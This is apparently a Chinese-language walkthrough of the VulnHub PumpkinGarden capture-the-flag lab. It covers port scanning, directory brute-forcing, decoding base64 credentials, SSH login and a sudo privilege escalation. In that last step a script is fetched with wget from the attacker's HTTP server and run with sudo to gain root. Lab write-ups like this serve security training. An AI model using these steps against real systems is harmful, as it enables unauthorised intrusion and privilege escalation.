本周实践的是vulnhub的PumpkinGarden镜像,
下载地址,https://download.vulnhub.com/missionpumpkin/PumpkinGarden.ova,
用virtualbox导入成功,
console上能直接看到地址,192.168.0.190,
做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,
发现靶机开了1515端口的http服务和3535端口的ssh服务,
对http服务进行路径暴破,dirb http://192.168.0.190:1515,
获取到http://192.168.0.190:1515/img ,
浏览器访问,在子目录文件中发现个base64编码,
c2NhcmVjcm93IDogNVFuQCR5,
解码,echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d,
获取到用户名密码scarecrow : 5Qn@$y,
ssh登录靶机,ssh [email protected] -p3535,
查看到另一个用户名密码,goblin : Y0n$M4sy3D1t,切过去,
又查看到提权方法,
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh,
但是已经无法访问到了,直接按别人writeup里的内容做就好了,
kali攻击机上创建脚本,vim sudoedit
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
在kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,
在靶机上下载脚本,wget http://192.168.0.192:8000/sudoedit,
修改权限,chmod 777 sudoedit,
执行,sudo ./sudoedit,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之PumpkinGarden的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论